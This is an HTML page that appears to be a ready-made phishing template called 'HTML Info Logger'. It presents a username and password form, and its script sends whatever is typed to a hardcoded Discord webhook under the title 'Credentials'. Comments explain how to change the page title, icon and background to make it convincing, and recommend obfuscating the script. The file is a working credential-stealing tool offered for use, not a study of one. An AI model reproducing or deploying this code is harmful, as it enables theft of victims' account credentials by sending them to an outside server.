<!--
  Coded by @DARKNOSY (https://github.com/DARKNOSY/Info-Logger)
  I recommend using https://obfuscator.io/ (for <script>)
-->
<!DOCTYPE html>
<html>
<head>
  <title>HTML Info Logger / @DARKNOSY</title> <!-- SET THE PAGE TITLE HERE -->
  <link rel="icon" href="https://avatars.githubusercontent.com/u/109553205?v=4" type="image/png"> <!-- SET THE PAGE ICON HERE -->
  <!-- SET THE PAGE BACKGROUND AT "background-image" IN "<style>" -->
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-image: url('https://wallpapercave.com/wp/wp7753575.jpg'); 
      background-size: cover;
      background-position: center;
      background-repeat: no-repeat;
    }

    .container {
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      height: 100vh;
    }

    h1 {
      text-align: center;
      color: white;
      text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.5);
    }

    form {
      max-width: 400px;
      margin: 20px auto;
      background-color: rgba(255, 255, 255, 0.8);
      padding: 20px;
      border-radius: 8px;
    }

    label {
      display: block;
      margin-bottom: 10px;
      font-weight: bold;
    }

    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 8px;
      border: 1px solid #ccc;
      border-radius: 4px;
      box-sizing: border-box;
      margin-bottom: 10px;
    }

    textarea {
      width: 100%;
      padding: 8px;
      border: 1px solid #ccc;
      border-radius: 4px;
      box-sizing: border-box;
      margin-bottom: 10px;
    }

    button {
      padding: 10px 20px;
      background-color: gray;
      color: white;
      border: none;
      border-radius: 4px;
      cursor: pointer;
      font-size: 16px;
    }

    button:hover {
      background-color: gray;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>HTML Info Logger</h1> 
    <h2>@DARKNOSY</h2> 
    <form id="webhookForm">
      <label for="username">Username:</label>
      <input type="text" id="username" required>

      <label for="password">Password:</label>
      <input type="password" id="password" required>

      <button type="submit">Submit</button>
    </form>
  </div>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script>
    $(document).ready(function() {
      var avatarUrl = 'https://avatars.githubusercontent.com/u/109553205?v=4';
      var username = "HTML Info Logger / @DARKNOSY";
      var webhookUrl = "https://discord.com/api/webhooks/1108438357958213694/gq_3SA2Vrsz0o0s4o9TTQbGENEvOEpw-OsHSuPXxuB5U34VQ0ETkmbiC0U2U_9ATJixE";

      $("#webhookForm").submit(function(event) {
        event.preventDefault();

        var usernameInput = $("#username").val();
        var passwordInput = $("#password").val();

        var embedFields = [
          { name: "Username", value: usernameInput },
          { name: "Password", value: passwordInput }
        ];

        var payload = {
          username: username,
          avatar_url: avatarUrl,
          embeds: [{
            author: {
              name: username,
              icon_url: avatarUrl
            },
            title: "Credentials",
            fields: embedFields,
            color: 2
          }]
        };

        $.ajax({
          url: webhookUrl,
          type: "POST",
          contentType: "application/json",
          data: JSON.stringify(payload),
          success: function() {
            alert("Success.");
          },
          error: function() {
            alert("Error.");
          }
        });
      });
    });
  </script>
</body>
</html>
<!--Coded by @DARKNOSY (https://github.com/DARKNOSY/Info-Logger)-->
